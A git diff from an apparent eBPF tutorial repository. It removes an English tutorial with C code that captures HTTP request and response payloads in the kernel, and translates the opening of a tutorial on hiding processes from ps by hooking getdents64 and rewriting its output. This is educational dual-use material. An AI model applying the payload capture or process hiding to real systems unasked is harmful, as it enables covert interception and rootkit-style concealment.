tracing is designed to have minimal performance impact. -- **Security**: Kernel validates eBPF programs to ensure they do not compromise system stability. - -**How It Works:** -eBPF syscall tracing typically involves attaching eBPF programs to tracepoints or kprobes related to the system calls being traced. When the traced system call is invoked, the eBPF program is executed, allowing data collection or even modification of system call parameters. - -### Comparison of eBPF Socket Filter and Syscall Tracing - -| Aspect | eBPF Socket Filter | eBPF Syscall Tracing | -| ------ | ------------------- | --------------------- | -| **Operational Layer** | Socket layer, primarily dealing with network packets received from or sent to sockets. | System call layer, monitoring and potentially altering the behavior of system calls made by applications. | -| **Primary Use Cases** | Mainly used for filtering, monitoring, and manipulation of network packets. | Used for performance analysis, security monitoring, and debugging of interactions with the network. 
| -| **Granularity** | Focuses on individual network packets. | Can monitor a wide range of system activities, including those unrelated to networking. | -| **Tracking HTTP Traffic** | Can be used to filter and capture HTTP packets passed through sockets. | Can trace system calls associated with networking operations, which may include HTTP traffic. | - -In summary, both eBPF socket filters and syscall tracing can be used to trace HTTP traffic, but socket filters are more direct and suitable for this purpose. However, if you are interested in the broader context of how an application interacts with the system (e.g., which system calls lead to HTTP traffic), syscall tracing can be highly valuable. In many advanced observability setups, both tools may be used simultaneously to provide a comprehensive view of system and network behavior. - -## Capturing HTTP Traffic with eBPF Socket Filter - -eBPF code consists of user-space and kernel-space components, and here we primarily focus on the kernel-space code. Below is the main logic for capturing HTTP traffic in the kernel using eBPF socket filter technology, and the complete code is provided: - -```c -SEC("socket") -int socket_handler(struct __sk_buff *skb) -{ - struct so_event *e; - __u8 verlen; - __u16 proto; - __u32 nhoff = ETH_HLEN; - __u32 ip_proto = 0; - __u32 tcp_hdr_len = 0; - __u16 tlen; - __u32 payload_offset = 0; - __u32 payload_length = 0; - __u8 hdr_len; - - bpf_skb_load_bytes(skb, 12, &proto, 2); - proto = __bpf_ntohs(proto); - if (proto != ETH_P_IP) - return 0; - - if (ip_is_fragment(skb, nhoff)) - return 0; - - // ip4 header lengths are variable - // access ihl as a u8 (linux/include/linux/skbuff.h) - bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len)); - hdr_len &= 0x0f; - hdr_len *= 4; - - /* verify hlen meets minimum size requirements */ - if (hdr_len < sizeof(struct iphdr)) - { - return 0; - } - - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); - - if (ip_proto != IPPROTO_TCP) - { - return 0; - } - - tcp_hdr_len = nhoff + hdr_len; - bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); - - __u8 doff; - bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff)); // read the first byte past __tcphdr->ack_seq, we can't do offsetof bit fields - doff &= 0xf0; // clean-up res1 - doff >>= 4; // move the upper 4 bits to low - doff *= 4; // convert to bytes length - - payload_offset = ETH_HLEN + hdr_len + doff; - payload_length = __bpf_ntohs(tlen) - hdr_len - doff; - - char line_buffer[7]; - if (payload_length < 7 || payload_offset < 0) - { - return 0; - } - bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); - bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); - if (bpf_strncmp(line_buffer, 3, "GET") != 0 && - bpf_strncmp(line_buffer, 4, "POST") != 0 && - bpf_strncmp(line_buffer, 3, "PUT") != 0 && - bpf_strncmp(line_buffer, 6, "DELETE") != 0 && - bpf_strncmp(line_buffer, 4, "HTTP") != 0) - { - return 0; - } - - /* reserve sample from BPF ringbuf */ - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (!e) - return 0; - - e->ip_proto = ip_proto; - bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4); - e->pkt_type = skb->pkt_type; - e->ifindex = skb->ifindex; - - e->payload_length = payload_length; - bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE); - - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), 
&(e->src_addr), 4); - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4); - bpf_ringbuf_submit(e, 0); - - return skb->len; -} -``` - -When analyzing this eBPF program, we will explain it in detail according to the content of each code block and provide relevant background knowledge: - -```c -SEC("socket") -int socket_handler(struct __sk_buff *skb) -{ - // ... -} -``` - -This is the entry point of the eBPF program, defining a function named `socket_handler` that the kernel uses to handle incoming network packets. This function is located in an eBPF section named `socket`, indicating that it is intended for socket handling. - -```c -struct so_event *e; -__u8 verlen; -__u16 proto; -__u32 nhoff = ETH_HLEN; -__u32 ip_proto = 0; -__u32 tcp_hdr_len = 0; -__u16 tlen; -__u32 payload_offset = 0; -__u32 payload_length = 0; -__u8 hdr_len; -``` - -In this code block, several variables are defined to store information needed during packet processing. These variables include `struct so_event *e` for storing event information, `verlen`, `proto`, `nhoff`, `ip_proto`, `tcp_hdr_len`, `tlen`, `payload_offset`, `payload_length`, and `hdr_len` for storing packet information. - -- `struct so_event *e;`: This is a pointer to the `so_event` structure for storing captured event information. The specific definition of this structure is located elsewhere in the program. -- `__u8 verlen;`, `__u16 proto;`, `__u32 nhoff = ETH_HLEN;`: These variables are used to store various pieces of information, such as protocol types, packet offsets, etc. `nhoff` is initialized to the length of the Ethernet frame header, typically 14 bytes, as Ethernet frame headers include destination MAC address, source MAC address, and frame type fields. -- `__u32 ip_proto = 0;`: This variable is used to store the type of the IP protocol and is initialized to 0. -- `__u32 tcp_hdr_len = 0;`: This variable is used to store the length of the TCP header and is initialized to 0. -- `__u16 tlen;`: This variable is used to store the total length of the IP packet. -- `__u32 payload_offset = 0;`, `__u32 payload_length = 0;`: These two variables are used to store the offset and length of the HTTP request payload. -- `__u8 hdr_len;`: This variable is used to store the length of the IP header. - -```c -bpf_skb_load_bytes(skb, 12, &proto, 2); -proto = __bpf_ntohs(proto); -if (proto != ETH_P_IP) - return 0; -``` - -Here, the code loads the Ethernet frame type field from the packet, which tells us the network layer protocol being used in the packet. It then uses the `__bpf_ntohs` function to convert the network byte order type field into host byte order. Next, the code checks if the type field is not equal to the Ethernet frame type for IPv4 (0x0800). If it's not equal, it means the packet is not an IPv4 packet, and the function returns 0, indicating that the packet should not be processed. - -Key concepts to understand here: - -- Ethernet Frame: The Ethernet frame is a data link layer (Layer 2) protocol used for transmitting data frames within a local area network (LAN). Ethernet frames typically include destination MAC address, source MAC address, and frame type fields. -- Network Byte Order: Network protocols often use big-endian byte order to represent data. Therefore, data received from the network needs to be converted into host byte order for proper interpretation on the host. Here, the type field from the network is converted to host byte order for further processing. 
-
-- IPv4 Frame Type (ETH_P_IP): This represents the frame type field in the Ethernet frame, where 0x0800 indicates IPv4.
-
-```c
-if (ip_is_fragment(skb, nhoff))
-	return 0;
-```
-
-This part of the code checks whether the packet is an IP fragment. IP fragmentation is a mechanism for splitting larger IP packets into multiple smaller fragments for transmission. Here, if the packet is an IP fragment, the function returns 0, indicating that only complete packets will be processed.
-
-```c
-static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff)
-{
-	__u16 frag_off;
-
-	bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);
-	frag_off = __bpf_ntohs(frag_off);
-	return frag_off & (IP_MF | IP_OFFSET);
-}
-```
-
-The above code is a helper function used to check if the incoming IPv4 packet is an IP fragment. IP fragmentation is a mechanism where, if the size of an IP packet exceeds the Maximum Transmission Unit (MTU) of the network, routers split it into smaller fragments for transmission across the network. The purpose of this function is to examine the fragment flags and fragment offset fields within the packet to determine if it is a fragment.
-
-Here's an explanation of the code line by line:
-
-1. `__u16 frag_off;`: Defines a 16-bit unsigned integer variable `frag_off` to store the fragment offset field.
-2. `bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`: This line of code uses the `bpf_skb_load_bytes` function to load the fragment offset field from the packet. `nhoff` is the offset of the IP header within the packet, and `offsetof(struct iphdr, frag_off)` calculates the offset of the fragment offset field within the IPv4 header.
-3. `frag_off = __bpf_ntohs(frag_off);`: Converts the loaded fragment offset field from network byte order (big-endian) to host byte order. Network protocols typically use big-endian to represent data, and the conversion to host byte order is done for further processing.
-4. `return frag_off & (IP_MF | IP_OFFSET);`: This line of code checks the value of the fragment offset field using a bitwise AND operation with two masks:
-   - `IP_MF`: Represents the "More Fragments" flag. If this flag is set to 1, it indicates that the packet is part of a fragmented sequence and more fragments follow.
-   - `IP_OFFSET`: Represents the fragment offset field. If the fragment offset field is non-zero, it indicates that the packet is part of a fragmented sequence and has a fragment offset value.
-   If the MF flag is set or the fragment offset field is non-zero, the result is non-zero, indicating that the packet is an IP fragment. If both are 0, the packet is not fragmented.
-
-It's important to note that the fragment offset field in the IP header is specified in units of 8 bytes, so the actual byte offset is obtained by left-shifting the value by 3 bits. Additionally, the "More Fragments" flag (IP_MF) in the IP header indicates whether there are more fragments in the sequence and is typically used in conjunction with the fragment offset field to indicate the status of fragmented packets.
-
-```c
-bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len));
-hdr_len &= 0x0f;
-hdr_len *= 4;
-```
-
-In this part of the code, the length of the IP header is loaded from the packet. The IP header length (IHL) field occupies the low four bits of the first header byte and is expressed in units of 4 bytes, so it needs to be converted to bytes. Here, it is converted by masking with 0x0f to keep the low four bits and then multiplying by 4.
-
-Key concept:
-
-- IP Header: The IP header contains fundamental information about a packet, such as the source IP address, destination IP address, protocol type, total length, identification, flags, fragment offset, time to live (TTL), and header checksum.
-
-```c
-if (hdr_len < sizeof(struct iphdr))
-{
-	return 0;
-}
-```
-
-This code segment checks if the length of the IP header meets the minimum length requirement, typically 20 bytes. If the length of the IP header is less than 20 bytes, it indicates an incomplete or corrupted packet, and the function returns 0, indicating that the packet should not be processed.
-
-Key concept:
-
-- `struct iphdr`: This is a structure defined in the Linux kernel, representing the format of an IPv4 header. It includes fields such as version, header length, type of service, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source IP address, and destination IP address.
-
-```c
-bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1);
-if (ip_proto != IPPROTO_TCP)
-{
-	return 0;
-}
-```
-
-Here, the code loads the protocol field from the IP header to determine the transport layer protocol used in the packet. Then, it checks if the protocol field is not equal to the value for TCP (IPPROTO_TCP). If it's not TCP, it means the packet is not an HTTP request or response, and the function returns 0.
-
-Key concept:
-
-- Transport Layer Protocol: The protocol field in the IP header indicates the transport layer protocol used in the packet, such as TCP, UDP, or ICMP.
-
-```c
-tcp_hdr_len = nhoff + hdr_len;
-```
-
-This line of code calculates the offset of the TCP header. It adds the length of the Ethernet frame header (`nhoff`) to the length of the IP header (`hdr_len`) to obtain the starting position of the TCP header.
-
-```c
-bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1);
-```
-
-This line of code loads the first byte of the IP header, which packs the version number (high four bits) and the header length (IHL, low four bits) into a single byte. The program stores it in `verlen`, but the rest of the logic does not use this value, since the header length has already been computed into `hdr_len` above.
-
-```c
-bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen));
-```
-
-This line of code loads the total length field of the IP header from the packet. The IP header's total length field represents the overall length of the IP packet, including both the IP header and the data portion.
-
-```c
-__u8 doff;
-bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff));
-doff &= 0xf0;
-doff >>= 4;
-doff *= 4;
-```
-
-This piece of code is used to calculate the length of the TCP header. It loads the byte containing the Data Offset field (also known as the Header Length field) from the TCP header, which represents the length of the TCP header in units of 4 bytes. The code keeps the upper four bits of that byte (masking away the reserved lower bits), then shifts them right by 4 bits, and finally multiplies by 4 to obtain the actual length of the TCP header in bytes.
-
-Key points to understand:
-
-- TCP Header: The TCP header contains information related to the TCP protocol, such as source port, destination port, sequence number, acknowledgment number, flags (e.g., SYN, ACK, FIN), window size, and checksum.
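-
-To make this bit arithmetic concrete, here is a small worked example; the raw byte value 0xA0 is an assumed illustration, not taken from a real capture:
-
-```c
-/* Hypothetical byte holding the TCP Data Offset field: 0xA0 = 1010 0000b. */
-__u8 doff = 0xA0;
-doff &= 0xf0; /* keep the upper 4 bits, drop the reserved low bits -> 0xA0 */
-doff >>= 4;   /* shift them down -> 10, the header length in 32-bit words */
-doff *= 4;    /* convert words to bytes -> 40 (20-byte base header plus 20 bytes of options) */
-```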
-
-```c
-payload_offset = ETH_HLEN + hdr_len + doff;
-payload_length = __bpf_ntohs(tlen) - hdr_len - doff;
-```
-
-These two lines of code calculate the offset and length of the HTTP request payload. They add the lengths of the Ethernet frame header, IP header, and TCP header together to obtain the offset to the data portion of the HTTP request. Then they calculate the length of the HTTP request data by subtracting the IP header length and the TCP header length from the IP total length field (`tlen`).
-
-Key point:
-
-- HTTP Request Payload: The actual data portion included in an HTTP request, typically consisting of the HTTP request headers and request body.
-
-```c
-char line_buffer[7];
-if (payload_length < 7 || payload_offset < 0)
-{
-	return 0;
-}
-bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7);
-bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer);
-```
-
-This portion of the code first checks whether the payload is shorter than 7 bytes or the offset is negative; if so, the data cannot hold the start of an HTTP request line, and the function returns 0. It then loads the first 7 bytes of the payload into a character array named `line_buffer` and uses the `bpf_printk` function to print that content to the kernel log for debugging and analysis.
-
-```c
-if (bpf_strncmp(line_buffer, 3, "GET") != 0 &&
-    bpf_strncmp(line_buffer, 4, "POST") != 0 &&
-    bpf_strncmp(line_buffer, 3, "PUT") != 0 &&
-    bpf_strncmp(line_buffer, 6, "DELETE") != 0 &&
-    bpf_strncmp(line_buffer, 4, "HTTP") != 0)
-{
-	return 0;
-}
-```
-
-> Note: The `bpf_strncmp` function is a helper function available from kernel version 5.17. For earlier versions, you can manually write a function to compare strings.
-
-This piece of code uses the `bpf_strncmp` function to compare the data in `line_buffer` with the HTTP request methods (GET, POST, PUT, DELETE) and the HTTP response prefix (HTTP). If none of them match, the packet is not an HTTP request or response, and the function returns 0, indicating that it should not be processed.
-
-```c
-e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
-if (!e)
-	return 0;
-```
-
-This section of the code attempts to reserve a block of memory from the BPF ring buffer to store event information. If it cannot reserve the memory block, it returns 0. The BPF ring buffer is used to pass event data between the eBPF program and user space.
-
-Key point:
-
-- BPF Ring Buffer: The BPF ring buffer is a mechanism for passing data between eBPF programs and user space. It can be used to store event information for further processing or analysis by user space applications.
-
-```c
-e->ip_proto = ip_proto;
-bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4);
-e->pkt_type = skb->pkt_type;
-e->ifindex = skb->ifindex;
-
-e->payload_length = payload_length;
-bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE);
-
-bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), &(e->src_addr), 4);
-bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4);
-bpf_ringbuf_submit(e, 0);
-
-return skb->len;
-```
-
-Finally, this code segment stores the captured event information in the `e` structure and submits it to the BPF ring buffer. It includes information such as the captured IP protocol, source and destination ports, packet type, interface index, payload length, source IP address, and destination IP address. Finally, it returns the length of the packet, indicating that the packet was successfully processed.
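-
-One practical caveat before moving on: as the note above says, the `bpf_strncmp` helper used for the method check only exists from kernel 5.17. On older kernels a hand-written comparison can stand in for it. The following is a minimal sketch under that assumption; `my_strncmp` is a hypothetical name, not part of the original program:
-
-```c
-/* Fallback for pre-5.17 kernels without the bpf_strncmp() helper:
- * a bounded, always-inlined byte comparison the verifier can unroll.
- * It mirrors the (buffer, length, literal) argument order used above. */
-static __always_inline int my_strncmp(const char *s, __u32 n, const char *t)
-{
-	for (__u32 i = 0; i < n; i++) {
-		if (s[i] != t[i])
-			return s[i] - t[i];
-	}
-	return 0;
-}
-```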
- -This code is primarily used to store captured event information for further processing. The BPF ring buffer is used to pass this information to user space for additional handling or logging. - -In summary, this eBPF program's main task is to capture HTTP requests. It accomplishes this by parsing the Ethernet frame, IP header, and TCP header of incoming packets to determine if they contain HTTP requests. Information about the requests is then stored in the `so_event` structure and submitted to the BPF ring buffer. This is an efficient method for capturing HTTP traffic at the kernel level and is suitable for applications such as network monitoring and security analysis. - -### Potential Limitations - -The above code has some potential limitations, and one of the main limitations is that it cannot handle URLs that span multiple packets. - -- Cross-Packet URLs: The code checks the URL in an HTTP request by parsing a single data packet. If the URL of an HTTP request spans multiple packets, it will only examine the URL in the first packet. This can lead to missing or partially capturing long URLs that span multiple data packets. - -To address this issue, a solution often involves reassembling multiple packets to reconstruct the complete HTTP request. This may require implementing packet caching and assembly logic within the eBPF program and waiting to collect all relevant packets until the HTTP request is detected. This adds complexity and may require additional memory to handle cases where URLs span multiple packets. - -### User-Space Code - -The user-space code's main purpose is to create a raw socket and then attach the previously defined eBPF program in the kernel to that socket, allowing the eBPF program to capture and process network packets received on that socket. Here's an example of the user-space code: - -```c -/* Create raw socket for localhost interface */ -sock = open_raw_sock(interface); -if (sock < 0) { - err = -2; - fprintf(stderr, "Failed to open raw socket\n"); - goto cleanup; -} - -/* Attach BPF program to raw socket */ -prog_fd = bpf_program__fd(skel->progs.socket_handler); -if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { - err = -3; - fprintf(stderr, "Failed to attach to raw socket\n"); - goto cleanup; -} -``` - -1. `sock = open_raw_sock(interface);`: This line of code calls a custom function `open_raw_sock`, which is used to create a raw socket. Raw sockets allow a user-space application to handle network packets directly without going through the protocol stack. The `interface` parameter might specify the network interface from which to receive packets, determining where to capture packets from. If creating the socket fails, it returns a negative value, otherwise, it returns the file descriptor of the socket `sock`. -2. If the value of `sock` is less than 0, indicating a failure to open the raw socket, it sets `err` to -2 and prints an error message on the standard error stream. -3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`: This line of code retrieves the file descriptor of the socket filter program (`socket_handler`) previously defined in the eBPF program. It is necessary to attach this program to the socket. `skel` is a pointer to an eBPF program object, and it provides access to the program collection. -4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`: This line of code uses the `setsockopt` system call to attach the eBPF program to the raw socket. 
It sets the `SO_ATTACH_BPF` option and passes the file descriptor of the eBPF program to the option, letting the kernel know which eBPF program to apply to this socket. If the attachment is successful, the socket starts capturing and processing network packets received on it. -5. If `setsockopt` fails, it sets `err` to -3 and prints an error message on the standard error stream. - -### Compilation and Execution - -The complete source code can be found at . To compile and run the code: - -```console -$ git submodule update --init --recursive -$ make - BPF .output/sockfilter.bpf.o - GEN-SKEL .output/sockfilter.skel.h - CC .output/sockfilter.o - BINARY sockfilter -$ sudo ./sockfilter -... -``` - -In another terminal, start a simple web server using Python: - -```console -python3 -m http.server -Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... -127.0.0.1 - - [18/Sep/2023 01:05:52] "GET / HTTP/1.1" 200 - -``` - -You can use `curl` to make requests: - -```c -$ curl http://0.0.0.0:8000/ - - - - -Directory listing for / -.... -``` - -In the eBPF program, you can see that it prints the content of HTTP requests: - -```console -127.0.0.1:34552(src) -> 127.0.0.1:8000(dst) -payload: GET / HTTP/1.1 -Host: 0.0.0.0:8000 -User-Agent: curl/7.88.1 -... -127.0.0.1:8000(src) -> 127.0.0.1:34552(dst) -payload: HTTP/1.0 200 OK -Server: SimpleHTTP/0.6 Python/3.11.4 -... -``` - -It captures both request and response content. - -## Capturing HTTP Traffic Using eBPF Syscall Tracepoints - -eBPF provides a powerful mechanism for tracing system calls at the kernel level. In this example, we'll use eBPF to trace the `accept` and `read` system calls to capture HTTP traffic. Due to space limitations, we'll provide a brief overview of the code framework. - -```c -struct -{ - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, u64); - __type(value, struct accept_args_t); -} active_accept_args_map SEC(".maps"); - -// Define a tracepoint at the entry of the accept system call -SEC("tracepoint/syscalls/sys_enter_accept") -int sys_enter_accept(struct trace_event_raw_sys_enter *ctx) -{ - u64 id = bpf_get_current_pid_tgid(); - // ... Get and store the arguments of the accept call - bpf_map_update_elem(&active_accept_args_map, &id, &accept_args, BPF_ANY); - return 0; -} - -// Define a tracepoint at the exit of the accept system call -SEC("tracepoint/syscalls/sys_exit_accept") -int sys_exit_accept(struct trace_event_raw_sys_exit *ctx) -{ - // ... Process the result of the accept call - struct accept_args_t *args = - bpf_map_lookup_elem(&active_accept_args_map, &id); - // ... Get and store the socket file descriptor obtained from the accept call - __u64 pid_fd = ((__u64)pid << 32) | (u32)ret_fd; - bpf_map_update_elem(&conn_info_map, &pid_fd, &conn_info, BPF_ANY); - // ... -} - -struct -{ - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 4096); - __type(key, u64); - __type(value, struct data_args_t); -} active_read_args_map SEC(".maps"); - -// Define a tracepoint at the entry of the read system call -SEC("tracepoint/syscalls/sys_enter_read") -int sys_enter_read(struct trace_event_raw_sys_enter *ctx) -{ - // ... Get and store the arguments of the read call - bpf_map_update_elem(&active_read_args_map, &id, &read_args, BPF_ANY); - return 0; -} - -// Helper function to check if it's an HTTP connection -static inline bool is_http_connection(const char *line_buffer, u64 bytes_count) -{ - // ... 
Check if the data is an HTTP request or response -} - -// Helper function to process the read data -static inline void process_data(struct trace_event_raw_sys_exit *ctx, - u64 id, const struct data_args_t *args, u64 bytes_count) -{ - // ... Process the read data, check if it's HTTP traffic, and send events - if (is_http_connection(line_buffer, bytes_count)) - { - // ... - bpf_probe_read_kernel(&event.msg, read_size, args->buf); - // ... - bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, - &event, sizeof(struct socket_data_event_t)); - } -} - -// Define a tracepoint at the exit of the read system call -SEC("tracepoint/syscalls/sys_exit_read") -int sys_exit_read(struct trace_event_raw_sys_exit *ctx) -{ - // ... Process the result of the read call - struct data_args_t *read_args = bpf_map_lookup_elem(&active_read_args_map, &id); - if (read_args != NULL) - { - process_data(ctx, id, read_args, bytes_count); - } - // ... - return 0; -} - -char _license[] SEC("license") = "GPL"; -``` - -This code briefly demonstrates how to use eBPF to trace system calls in the Linux kernel to capture HTTP traffic. Here's a detailed explanation of the hook locations and the flow, as well as the complete set of system calls that need to be hooked for comprehensive request tracing: - -### Hook Locations and Flow - -- The code uses eBPF Tracepoint functionality. Specifically, it defines a series of eBPF programs and binds them to specific system call Tracepoints to capture entry and exit events of these system calls. - -- First, it defines two eBPF hash maps (`active_accept_args_map` and `active_read_args_map`) to store system call parameters. These maps are used to track `accept` and `read` system calls. - -- Next, it defines multiple Tracepoint tracing programs, including: - - `sys_enter_accept`: Defined at the entry of the `accept` system call, used to capture the arguments of the `accept` system call and store them in the hash map. - - `sys_exit_accept`: Defined at the exit of the `accept` system call, used to process the result of the `accept` system call, including obtaining and storing the new socket file descriptor and related connection information. - - `sys_enter_read`: Defined at the entry of the `read` system call, used to capture the arguments of the `read` system call and store them in the hash map. - - `sys_exit_read`: Defined at the exit of the `read` system call, used to process the result of the `read` system call, including checking if the read data is HTTP traffic and sending events. - -- In `sys_exit_accept` and `sys_exit_read`, there is also some data processing and event sending logic, such as checking if the data is an HTTP connection, assembling event data, and using `bpf_perf_event_output` to send events to user space for further processing. - -### Complete Set of System Calls to Hook - -To fully implement HTTP request tracing, the system calls that typically need to be hooked include: - -- `socket`: Used to capture socket creation for tracking new connections. -- `bind`: Used to obtain port information where the socket is bound. -- `listen`: Used to start listening for connection requests. -- `accept`: Used to accept connection requests and obtain new socket file descriptors. -- `read`: Used to capture received data and check if it contains HTTP requests. -- `write`: Used to capture sent data and check if it contains HTTP responses. - -The provided code already covers the tracing of `accept` and `read` system calls. 
To complete HTTP request tracing, additional system calls need to be hooked, and corresponding logic needs to be implemented to handle the parameters and results of these system calls. - -The complete source code can be found at . - -## Summary - -In today's complex technological landscape, system observability has become crucial, especially in the context of microservices and cloud-native applications. This article explores how to leverage eBPF technology for tracing the seven-layer protocols, along with the challenges and solutions that may arise in this process. Here's a summary of the content covered in this article: - -1. **Introduction**: - - Modern applications often consist of multiple microservices and distributed components, making it essential to observe the behavior of the entire system. - - Seven-layer protocols (such as HTTP, gRPC, MQTT, etc.) provide detailed insights into application interactions, but monitoring these protocols can be challenging. - -2. **Role of eBPF Technology**: - - eBPF allows developers to dive deep into the kernel layer for real-time observation and analysis of system behavior without modifying or inserting application code. - - eBPF technology offers a powerful tool for monitoring seven-layer protocols, especially in a microservices environment. - -3. **Tracing Seven-Layer Protocols**: - - The article discusses the challenges of tracing seven-layer protocols, including their complexity and dynamism. - - Traditional network monitoring tools struggle with the complexity of seven-layer protocols. - -4. **Applications of eBPF**: - - eBPF provides two primary methods for tracing seven-layer protocols: socket filters and syscall tracing. - - Both of these methods help capture network request data for protocols like HTTP and analyze them. - -5. **eBPF Practical Tutorial**: - - The article provides a practical eBPF tutorial demonstrating how to capture and analyze HTTP traffic using eBPF socket filters or syscall tracing. - - The tutorial covers the development of eBPF programs, the use of the eBPF toolchain, and the implementation of HTTP request tracing. - -Through this article, readers can gain a deep understanding of how to use eBPF technology for tracing seven-layer protocols, particularly HTTP traffic. This knowledge will help enhance the monitoring and analysis of network traffic, thereby improving application performance and security. If you're interested in learning more about eBPF and its practical applications, you can visit our tutorial code repository at or our website at for more examples and complete tutorials. - -> The original link of this article: diff --git a/src/24-hide/README.md b/src/24-hide/README.md index e841921..437af5a 100644 --- a/src/24-hide/README.md +++ b/src/24-hide/README.md @@ -1,20 +1,20 @@ -# eBPF 开发实践:使用 eBPF 隐藏进程或文件信息 +# eBPF Practical Tutorial: Hiding Process or File Information -eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 +eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows you to run, load, and update user-defined code without having to change the kernel source code or reboot the kernel. This capability allows eBPF to be used in a wide range of applications such as network and system performance analysis, packet filtering, and security policies. 
-在本篇教程中,我们将展示如何利用 eBPF 来隐藏进程或文件信息,这是网络安全和防御领域中一种常见的技术。 +In this tutorial, we will show how eBPF can be used to hide process or file information, a common technique in the field of network security and defence. -## 背景知识与实现机制 +## Background Knowledge and Implementation Mechanism -"进程隐藏" 能让特定的进程对操作系统的常规检测机制变得不可见。在黑客攻击或系统防御的场景中,这种技术都可能被应用。具体来说,Linux 系统中每个进程都在 /proc/ 目录下有一个以其进程 ID 命名的子文件夹,包含了该进程的各种信息。`ps` 命令就是通过查找这些文件夹来显示进程信息的。因此,如果我们能隐藏某个进程的 /proc/ 文件夹,就能让这个进程对 `ps` 命令等检测手段“隐身”。 +"Process hiding" enables a specific process to become invisible to the operating system's regular detection mechanisms. This technique can be used in both hacking and system defence scenarios. Specifically, each process on a Linux system has a subfolder named after its process ID in the /proc/ directory, which contains various information about the process. `ps` displays process information by looking in these folders. Therefore, if we can hide the /proc/ folder of a process, we can make that process invisible to `ps` commands and other detection methods. -要实现进程隐藏,关键在于操作 `/proc/` 目录。在 Linux 中,`getdents64` 系统调用可以读取目录下的文件信息。我们可以通过挂接这个系统调用,修改它返回的结果,从而达到隐藏文件的目的。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改 `getdents64` 返回的结果。 +The key to achieving process hiding is to manipulate the `/proc/` directory. In Linux, the `getdents64` system call can read the information of files in the directory. We can hide files by hooking into this system call and modifying the results it returns. To do this, you need to use eBPF's `bpf_probe_write_user` function, which can modify user-space memory, and therefore can be used to modify the results returned by `getdents64`. -下面,我们会详细介绍如何在内核态和用户态编写 eBPF 程序来实现进程隐藏。 +In the following, we will describe in detail how to write eBPF programs in both kernel and user states to implement process hiding. -### 内核态 eBPF 程序实现 +### Kernel eBPF Program Implementation -接下来,我们将详细介绍如何在内核态编写 eBPF 程序来实现进程隐藏。首先是 eBPF 程序的起始部分: +Next, we will describe in detail how to write eBPF program to implement process hiding in kernel state. The first part of the eBPF programme is the start: ```c // SPDX-License-Identifier: BSD-3-Clause @@ -66,28 +66,28 @@ struct { } map_prog_array SEC(".maps"); ``` -我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。 +The first thing we need to do is to understand the basic structure of the eBPF programme and the important components that are used. The first few lines reference several important header files, such as "vmlinux.h", "bpf_helpers.h", "bpf_tracing.h" and "bpf_core_read.h". These files provide the infrastructure needed for eBPF programming and some important functions or macros. -- "vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。 -- "bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。 -- "bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。 -- "bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。 +- "vmlinux.h" is a header file containing the complete kernel data structures extracted from the vmlinux kernel binary. Using this header file, eBPF programs can access kernel data structures. +- The "bpf_helpers.h" header file defines a series of macros that encapsulate the BPF 